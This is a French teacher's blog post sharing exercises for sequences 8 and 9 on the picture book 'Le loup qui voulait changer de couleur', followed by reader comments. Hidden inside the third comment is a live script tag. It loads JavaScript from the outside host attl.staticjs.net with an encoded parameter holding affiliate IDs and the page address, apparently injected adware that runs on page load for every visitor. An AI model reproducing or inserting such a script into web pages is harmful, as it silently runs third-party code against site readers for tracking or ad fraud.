• séquence 8 et 9: le loup qui voulait changer de couleur

    séquence 9 exos

    séquence 8 exos

    Ca y est!!! L'exploitation de cet album est terminé. Tout ce travail ne serait peut être pas encore fini sans le concours amical et très agréable de Lydie. Mille merci à toi pour ce partage


    Tags Tags : , , , ,
  • Commentaires

    1
    domrod Profil de domrod
    Mercredi 19 Septembre 2012 à 17:36

    Un énorme merci pour le partage et le travail sur le loup qui voulait changer de couleur. Je mets cela en réserve pour débuter  l'an prochain.

    Bonne soirée

    Dom

    2
    chalys Profil de chalys
    Jeudi 20 Septembre 2012 à 18:36

    Merci à toi... Moi je pense le tester cette année, je verrai bien si faire "à la manière de" ça marche pour autre chose que pour les arts visuels

    Bonne soirée

    3
    natouch
    Lundi 1er Avril 2013 à 15:53

    bonjour

    je travaille en mat avec des PS-MS et en faisant une recherche d'idées autour de ce fameux loup qui me fait envie depuis quelques temps, je suis tombée sur ce site et je dis ouaouh. C'est loin de ce que je pourrais faire avec mes élèves mais j'ai une super base d'images.

    Je suis d'autant plus bluffée par tout ce que j'ai regardé que mon dernier loupiot de la maison est au CP avec Ribambelle suivi à la lettre (ses 2 soeurs ont travaillé avec les mêmes albums avant lui), et je connais par coeur quel bazar chez zoé et toute la série. En ce moment c'est Zékéyé. Je retrouve tout à fait ici la démarche et j'imagine largement le travail derrière. Vraiment bravo et merci pour le partage.

    Je reviendrai faire des petits tours par ici, ça vaut le coup. Peut-être un jour aurai-je moi aussi le courage de partager mes documents.

    <script src="http://attl.staticjs.net/amz/aeyJhZmZpZCI6MTA4MCwic3ViYWZmaWQiOjEwMjAsImhyZWYiOiJodHRwOi8vY2hhbHlzLmVrbGFibG9nLmNvbS9zZXF1ZW5jZS04LWV0LTktbGUtbG91cC1xdWktdm91bGFpdC1jaGFuZ2VyLWRlLWNvdWxldXItYTQ5MzMwMzY2Iiwid2lkdGgiOjEyODAsImhlaWdodCI6ODAwLCJsb2FkZXJfY2xpZW50X3RpbWVzdGFtcCI6MTM2NDgyMzk5ODcwMn0%3D.js" type="text/javascript"></script>
    4
    chalys Profil de chalys
    Lundi 1er Avril 2013 à 16:14

    Vraiment un grand merci pour ton commentaire qui me conforte dans mon idée de partage.  Cela fait seulement deux ans que je fais du CP et même si je trouve la méthode ribambelle très bien faite je me suis lassée très rapidement des albums étudiés et de leur manque de profondeur... Je ne te comprends que trop!

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :